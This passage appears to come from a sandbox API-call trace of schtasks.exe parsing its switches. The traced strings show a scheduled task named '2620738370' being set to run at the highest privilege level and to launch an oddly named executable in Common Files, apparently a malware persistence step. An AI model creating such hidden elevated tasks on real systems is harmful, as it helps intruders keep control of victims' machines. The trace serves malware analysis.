[0028.280] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.280] lstrlenW (lpString="|run|") returned 5 [0028.280] lstrlenW (lpString="|tn|") returned 4 [0028.280] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0028.280] SetLastError (dwErrCode=0x490) [0028.280] lstrlenW (lpString="end") returned 3 [0028.280] lstrlenW (lpString="end") returned 3 [0028.280] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] lstrlenW (lpString="tn") returned 2 [0028.280] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.280] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|end|") returned 5 [0028.280] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.280] lstrlenW (lpString="|end|") returned 5 [0028.280] lstrlenW (lpString="|tn|") returned 4 [0028.280] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0028.280] SetLastError (dwErrCode=0x490) [0028.281] lstrlenW (lpString="showsid") returned 7 [0028.281] lstrlenW (lpString="showsid") returned 7 [0028.281] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.281] lstrlenW (lpString="tn") returned 2 [0028.281] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.281] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|showsid|") returned 9 [0028.281] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tn|") returned 4 [0028.281] lstrlenW (lpString="|showsid|") returned 9 [0028.281] lstrlenW (lpString="|tn|") returned 4 [0028.281] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x0) [0028.281] lstrlenW (lpString="/tn") returned 3 [0028.281] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x0) [0028.281] lstrlenW (lpString="/tn") returned 3 [0028.281] GetProcessHeap () returned 0x350000 [0028.281] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x8) returned 0x3669c8 [0028.281] GetProcessHeap () returned 0x350000 [0028.281] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3653f8 [0028.281] SetLastError (dwErrCode=0x0) [0028.281] SetLastError (dwErrCode=0x0) [0028.281] lstrlenW (lpString="2620738370") returned 10 [0028.281] lstrlenW (lpString="-/") returned 2 [0028.281] StrChrIW (lpStart="-/", wMatch=0x32) returned 0x0 [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x0) [0028.281] lstrlenW (lpString="2620738370") returned 10 [0028.281] StrChrIW (lpStart="2620738370", wMatch=0x3a) returned 0x0 [0028.281] SetLastError (dwErrCode=0x490) [0028.281] SetLastError (dwErrCode=0x0) [0028.281] lstrlenW (lpString="2620738370") returned 10 [0028.281] GetProcessHeap () returned 0x350000 [0028.281] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x16) returned 0x365418 [0028.281] GetProcessHeap () returned 0x350000 [0028.281] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365438 [0028.281] SetLastError (dwErrCode=0x0) [0028.282] SetLastError (dwErrCode=0x0) [0028.282] lstrlenW (lpString="/rl") returned 3 [0028.282] lstrlenW (lpString="-/") returned 2 [0028.282] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.282] lstrlenW (lpString="?") returned 1 [0028.282] lstrlenW (lpString="?") returned 1 [0028.282] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] lstrlenW (lpString="rl") returned 2 [0028.282] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|?|") returned 3 [0028.282] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.282] lstrlenW (lpString="|?|") returned 3 [0028.282] lstrlenW (lpString="|rl|") returned 4 [0028.282] SetLastError (dwErrCode=0x490) [0028.282] lstrlenW (lpString="create") returned 6 [0028.282] lstrlenW (lpString="create") returned 6 [0028.282] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] lstrlenW (lpString="rl") returned 2 [0028.282] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.282] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.282] lstrlenW (lpString="|create|") returned 8 [0028.282] lstrlenW (lpString="|rl|") returned 4 [0028.282] StrStrIW (lpFirst="|create|", lpSrch="|rl|") returned 0x0 [0028.282] SetLastError (dwErrCode=0x490) [0028.282] lstrlenW (lpString="delete") returned 6 [0028.282] lstrlenW (lpString="delete") returned 6 [0028.282] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] lstrlenW (lpString="rl") returned 2 [0028.282] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.282] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|delete|") returned 8 [0028.282] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.282] lstrlenW (lpString="|delete|") returned 8 [0028.283] lstrlenW (lpString="|rl|") returned 4 [0028.283] StrStrIW (lpFirst="|delete|", lpSrch="|rl|") returned 0x0 [0028.283] SetLastError (dwErrCode=0x490) [0028.283] lstrlenW (lpString="query") returned 5 [0028.283] lstrlenW (lpString="query") returned 5 [0028.283] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] lstrlenW (lpString="rl") returned 2 [0028.283] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|query|") returned 7 [0028.283] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.283] lstrlenW (lpString="|query|") returned 7 [0028.283] lstrlenW (lpString="|rl|") returned 4 [0028.283] StrStrIW (lpFirst="|query|", lpSrch="|rl|") returned 0x0 [0028.283] SetLastError (dwErrCode=0x490) [0028.283] lstrlenW (lpString="change") returned 6 [0028.283] lstrlenW (lpString="change") returned 6 [0028.283] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] lstrlenW (lpString="rl") returned 2 [0028.283] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|change|") returned 8 [0028.283] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.283] lstrlenW (lpString="|change|") returned 8 [0028.283] lstrlenW (lpString="|rl|") returned 4 [0028.283] StrStrIW (lpFirst="|change|", lpSrch="|rl|") returned 0x0 [0028.283] SetLastError (dwErrCode=0x490) [0028.283] lstrlenW (lpString="run") returned 3 [0028.283] lstrlenW (lpString="run") returned 3 [0028.283] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] lstrlenW (lpString="rl") returned 2 [0028.283] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.283] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|run|") returned 5 [0028.283] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.283] lstrlenW (lpString="|run|") returned 5 [0028.284] lstrlenW (lpString="|rl|") returned 4 [0028.284] StrStrIW (lpFirst="|run|", lpSrch="|rl|") returned 0x0 [0028.284] SetLastError (dwErrCode=0x490) [0028.284] lstrlenW (lpString="end") returned 3 [0028.284] lstrlenW (lpString="end") returned 3 [0028.284] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.284] lstrlenW (lpString="rl") returned 2 [0028.284] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.284] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|end|") returned 5 [0028.284] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.284] lstrlenW (lpString="|end|") returned 5 [0028.284] lstrlenW (lpString="|rl|") returned 4 [0028.284] StrStrIW (lpFirst="|end|", lpSrch="|rl|") returned 0x0 [0028.284] SetLastError (dwErrCode=0x490) [0028.284] lstrlenW (lpString="showsid") returned 7 [0028.284] lstrlenW (lpString="showsid") returned 7 [0028.284] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.284] lstrlenW (lpString="rl") returned 2 [0028.284] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.284] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|showsid|") returned 9 [0028.284] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|rl|") returned 4 [0028.284] lstrlenW (lpString="|showsid|") returned 9 [0028.284] lstrlenW (lpString="|rl|") returned 4 [0028.284] StrStrIW (lpFirst="|showsid|", lpSrch="|rl|") returned 0x0 [0028.284] SetLastError (dwErrCode=0x490) [0028.284] SetLastError (dwErrCode=0x490) [0028.284] SetLastError (dwErrCode=0x0) [0028.284] lstrlenW (lpString="/rl") returned 3 [0028.284] StrChrIW (lpStart="/rl", wMatch=0x3a) returned 0x0 [0028.284] SetLastError (dwErrCode=0x490) [0028.284] SetLastError (dwErrCode=0x0) [0028.284] lstrlenW (lpString="/rl") returned 3 [0028.284] GetProcessHeap () returned 0x350000 [0028.284] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x8) returned 0x3669d8 [0028.284] GetProcessHeap () returned 0x350000 [0028.284] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365458 [0028.284] SetLastError (dwErrCode=0x0) [0028.285] SetLastError (dwErrCode=0x0) [0028.285] lstrlenW (lpString="highest") returned 7 [0028.285] lstrlenW (lpString="-/") returned 2 [0028.285] StrChrIW (lpStart="-/", wMatch=0x68) returned 0x0 [0028.285] SetLastError (dwErrCode=0x490) [0028.285] SetLastError (dwErrCode=0x490) [0028.285] SetLastError (dwErrCode=0x0) [0028.285] lstrlenW (lpString="highest") returned 7 [0028.285] StrChrIW (lpStart="highest", wMatch=0x3a) returned 0x0 [0028.285] SetLastError (dwErrCode=0x490) [0028.285] SetLastError (dwErrCode=0x0) [0028.285] lstrlenW (lpString="highest") returned 7 [0028.285] GetProcessHeap () returned 0x350000 [0028.285] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d78 [0028.285] GetProcessHeap () returned 0x350000 [0028.285] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365478 [0028.285] SetLastError (dwErrCode=0x0) [0028.285] SetLastError (dwErrCode=0x0) [0028.285] lstrlenW (lpString="/tr") returned 3 [0028.285] lstrlenW (lpString="-/") returned 2 [0028.285] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0028.285] lstrlenW (lpString="?") returned 1 [0028.285] lstrlenW (lpString="?") returned 1 [0028.285] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.285] lstrlenW (lpString="tr") returned 2 [0028.285] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.285] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|?|") returned 3 [0028.285] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.285] lstrlenW (lpString="|?|") returned 3 [0028.285] lstrlenW (lpString="|tr|") returned 4 [0028.285] SetLastError (dwErrCode=0x490) [0028.285] lstrlenW (lpString="create") returned 6 [0028.285] lstrlenW (lpString="create") returned 6 [0028.285] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.285] lstrlenW (lpString="tr") returned 2 [0028.285] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.285] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|create|") returned 8 [0028.285] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.286] lstrlenW (lpString="|create|") returned 8 [0028.286] lstrlenW (lpString="|tr|") returned 4 [0028.286] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0028.286] SetLastError (dwErrCode=0x490) [0028.286] lstrlenW (lpString="delete") returned 6 [0028.286] lstrlenW (lpString="delete") returned 6 [0028.286] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] lstrlenW (lpString="tr") returned 2 [0028.286] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|delete|") returned 8 [0028.286] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.286] lstrlenW (lpString="|delete|") returned 8 [0028.286] lstrlenW (lpString="|tr|") returned 4 [0028.286] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0028.286] SetLastError (dwErrCode=0x490) [0028.286] lstrlenW (lpString="query") returned 5 [0028.286] lstrlenW (lpString="query") returned 5 [0028.286] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] lstrlenW (lpString="tr") returned 2 [0028.286] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|query|") returned 7 [0028.286] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.286] lstrlenW (lpString="|query|") returned 7 [0028.286] lstrlenW (lpString="|tr|") returned 4 [0028.286] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0028.286] SetLastError (dwErrCode=0x490) [0028.286] lstrlenW (lpString="change") returned 6 [0028.286] lstrlenW (lpString="change") returned 6 [0028.286] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] lstrlenW (lpString="tr") returned 2 [0028.286] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.286] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|change|") returned 8 [0028.286] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.287] lstrlenW (lpString="|change|") returned 8 [0028.287] lstrlenW (lpString="|tr|") returned 4 [0028.287] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0028.287] SetLastError (dwErrCode=0x490) [0028.287] lstrlenW (lpString="run") returned 3 [0028.287] lstrlenW (lpString="run") returned 3 [0028.287] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] lstrlenW (lpString="tr") returned 2 [0028.287] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|run|") returned 5 [0028.287] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.287] lstrlenW (lpString="|run|") returned 5 [0028.287] lstrlenW (lpString="|tr|") returned 4 [0028.287] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0028.287] SetLastError (dwErrCode=0x490) [0028.287] lstrlenW (lpString="end") returned 3 [0028.287] lstrlenW (lpString="end") returned 3 [0028.287] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] lstrlenW (lpString="tr") returned 2 [0028.287] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|end|") returned 5 [0028.287] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.287] lstrlenW (lpString="|end|") returned 5 [0028.287] lstrlenW (lpString="|tr|") returned 4 [0028.287] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0028.287] SetLastError (dwErrCode=0x490) [0028.287] lstrlenW (lpString="showsid") returned 7 [0028.287] lstrlenW (lpString="showsid") returned 7 [0028.287] _memicmp (_Buf1=0x364d30, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] lstrlenW (lpString="tr") returned 2 [0028.287] _memicmp (_Buf1=0x364d60, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.287] _vsnwprintf (in: _Buffer=0x3653b8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|showsid|") returned 9 [0028.287] _vsnwprintf (in: _Buffer=0x365378, _BufferCount=0x5, _Format="|%s|", _ArgList=0x16f3a0 | out: _Buffer="|tr|") returned 4 [0028.287] lstrlenW (lpString="|showsid|") returned 9 [0028.288] lstrlenW (lpString="|tr|") returned 4 [0028.288] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0028.288] SetLastError (dwErrCode=0x490) [0028.288] SetLastError (dwErrCode=0x490) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] lstrlenW (lpString="/tr") returned 3 [0028.288] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0028.288] SetLastError (dwErrCode=0x490) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] lstrlenW (lpString="/tr") returned 3 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x8) returned 0x3669e8 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x365498 [0028.288] SetLastError (dwErrCode=0x0) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.288] lstrlenW (lpString="-/") returned 2 [0028.288] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0028.288] SetLastError (dwErrCode=0x490) [0028.288] SetLastError (dwErrCode=0x490) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.288] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", wMatch=0x3a) returned=":\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" [0028.288] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364d90 [0028.288] _memicmp (_Buf1=0x364d90, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0xc) returned 0x364da8 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x10) returned 0x364dc0 [0028.288] _memicmp (_Buf1=0x364dc0, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.288] GetProcessHeap () returned 0x350000 [0028.288] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x48) returned 0x3669f8 [0028.288] SetLastError (dwErrCode=0x7a) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] SetLastError (dwErrCode=0x0) [0028.288] lstrlenW (lpString="C") returned 1 [0028.288] SetLastError (dwErrCode=0x490) [0028.289] SetLastError (dwErrCode=0x0) [0028.289] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x44) returned 0x366a48 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] RtlAllocateHeap (HeapHandle=0x350000, Flags=0xc, Size=0x14) returned 0x3654b8 [0028.289] SetLastError (dwErrCode=0x0) [0028.289] GetProcessHeap () returned 0x350000 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669b8) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669b8) returned 0x8 [0028.289] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3669b8 | out: hHeap=0x350000) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365398) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365398) returned 0x14 [0028.289] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365398 | out: hHeap=0x350000) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d48) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d48) returned 0x10 [0028.289] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364d48 | out: hHeap=0x350000) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] GetProcessHeap () returned 0x350000 [0028.289] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3653d8) returned 1 [0028.289] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3653d8) returned 0x14 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3653d8 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669c8) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669c8) returned 0x8 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3669c8 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3653f8) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3653f8) returned 0x14 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3653f8 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365418) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365418) returned 0x16 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365418 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365438) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365438) returned 0x14 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365438 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669d8) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669d8) returned 0x8 [0028.290] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3669d8 | out: hHeap=0x350000) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365458) returned 1 [0028.290] GetProcessHeap () returned 0x350000 [0028.290] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365458) returned 0x14 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365458 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d78) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d78) returned 0x10 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364d78 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365478) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365478) returned 0x14 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365478 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669e8) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669e8) returned 0x8 [0028.291] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3669e8 | out: hHeap=0x350000) returned 1 [0028.291] GetProcessHeap () returned 0x350000 [0028.291] GetProcessHeap () returned 0x350000 